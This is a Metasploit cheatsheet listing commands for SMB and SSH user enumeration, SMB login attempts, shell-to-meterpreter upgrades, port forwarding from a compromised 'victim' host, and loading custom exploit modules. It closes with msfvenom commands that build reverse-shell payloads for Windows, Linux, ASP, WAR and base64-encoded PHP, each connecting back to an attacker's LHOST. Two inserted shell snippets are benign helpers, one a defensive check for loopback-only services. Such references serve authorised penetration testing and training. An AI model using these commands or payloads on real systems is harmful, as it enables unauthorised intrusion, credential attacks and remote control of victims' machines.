Metasploit Cheatsheet

Metasploit Initialisation

service postgresql start
msfdb init
msfconsole

To verify database connectivity:

msf > db_status

Auxiliary modules

To discover netbios hostnames:

use auxiliary/scanner/netbios/nbname

SMB enumeration:

use auxiliary/scanner/smb/smb_enumshares - enumerates the SMB shares available on a remote system

use auxiliary/scanner/smb/smb_enumusers - connects to each system via SMB RPC and enumerates the users on it

use auxiliary/scanner/smb/smb_login - attempts to log in via SMB with the supplied credentials

use auxiliary/scanner/smb/smb_version - determines the version of the SMB service that is running

SSH users enumeration:

use auxiliary/scanner/ssh/ssh_enumusers - checks whether a given user exists on (or can connect to) the SSH server

Post modules

Upgrade to meterpreter

use post/multi/manage/shell_to_meterpreter

Port Forward

For example, we have a meterpreter session on a Windows machine, and something is listening there on port 9090 that we cannot reach from outside (because of a firewall or similar). To bypass the firewall and connect to port 9090 on the Windows machine through the session:

portfwd add -l <local port on our KALI machine> -p <port on victim (in our case Windows) machine> -r <victim IP address>
portfwd add -l 1234 -p 9090 -r 10.10.10.1

If the service is listening on localhost only:

portfwd add -l 1234 -p 9090 -r 127.0.0.1

-l - local port on our Kali machine
-p - victim port we want to access
-r - victim IP address
add - adds the forwarding rule

To delete all portfwd rules:
portfwd flush
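The point of the example above is that neither a host firewall nor a loopback-only bind protects a service once an attacker has a session on that host: the forward is opened from the compromised machine itself. The following shell snippet, added here and not part of the original cheatsheet, is the defender's side of that check: it takes constructed `ss -ltn`-style listener lines (the sample is made up) and prints the ports bound only to 127.0.0.1 or [::1], i.e. the services whose only access control is "not reachable from outside".

```shell
#!/bin/sh
# Added example, not from the original cheatsheet.
# Constructed sample in the column layout of `ss -ltn`:
# State Recv-Q Send-Q Local-Address:Port Peer-Address:Port
SAMPLE_LISTENERS='LISTEN 0 128 127.0.0.1:9090 0.0.0.0:*
LISTEN 0 128 0.0.0.0:445 0.0.0.0:*
LISTEN 0 128 [::1]:5432 [::]:*
LISTEN 0 128 *:22 *:*'

# loopback_only_ports LINES: print the port of every LISTEN entry bound to a
# loopback address only. A host firewall never sees traffic to these ports,
# but a port forward from a compromised host reaches them as if it were local,
# so they deserve real authentication rather than relying on the bind address.
loopback_only_ports() {
  printf '%s\n' "$1" | awk '$1 == "LISTEN" {
    addr = $4; sub(/:[0-9]+$/, "", addr)   # strip the trailing :port
    port = $4; sub(/^.*:/, "", port)       # keep only the port
    if (addr == "127.0.0.1" || addr == "[::1]") print port
  }'
}

# Real use: loopback_only_ports "$(ss -ltn)"
```

On a live host, feed it `ss -ltn` (Linux) output; the function reads only the fourth column, so the sample lines are the only thing that is constructed.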

Add custom module

Create folder for exploit:

mkdir -p $HOME/.msf4/modules/exploits/test

Place the exploit file in the created folder, then open msfconsole and run:

msf > reload_all

To use recently added exploit:

use exploit/test/<exploit_file>   (the file name without the .rb extension)
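The steps above (create the folder, copy the file, reload, use) are easy to get subtly wrong: a file in the wrong tree or with a Ruby syntax error simply does not show up after `reload_all`. The helper below, an added example rather than anything shipped with Metasploit, does the staging and prints the path to `use`. `MSF_HOME` is an assumed override of `$HOME` so the function can be exercised in a scratch directory; the mapping from the `exploits` directory to the `exploit/` module prefix is standard Metasploit layout.

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet or of Metasploit.
# stage_msf_module FILE TYPE SUBDIR
#   copies FILE (a .rb module) into $HOME/.msf4/modules/TYPE/SUBDIR and prints
#   the module path to pass to `use`. TYPE is the directory name (exploits,
#   auxiliary, post, payloads, ...). MSF_HOME is an assumed test-only override.
stage_msf_module() {
  file=$1; type=$2; subdir=$3
  base=${MSF_HOME:-$HOME}/.msf4/modules/$type/$subdir

  case $file in
    *.rb) ;;
    *) echo "module must be a .rb file: $file" >&2; return 1 ;;
  esac

  # Catch syntax errors here; reload_all only logs them and silently skips the file.
  if command -v ruby >/dev/null 2>&1; then
    ruby -c "$file" >/dev/null || return 1
  fi

  mkdir -p "$base" && cp "$file" "$base/" || return 1

  # Directory names are plural, module paths are singular for these types.
  case $type in
    exploits) prefix=exploit ;;
    payloads) prefix=payload ;;
    encoders) prefix=encoder ;;
    nops)     prefix=nop ;;
    *)        prefix=$type ;;
  esac
  echo "$prefix/$subdir/$(basename "$file" .rb)"
}

# Typical use, then `reload_all` inside msfconsole:
#   stage_msf_module ./my_module.rb exploits test
```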

msfvenom example payloads


List payloads

msfvenom -l payloads

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port to listen> -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port to listen> -f elf > shell.elf

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port to listen> -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your IP> LPORT=<your port to listen> -f war > shell.war

PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port to listen> -e php/base64 -f raw > meterpreter.php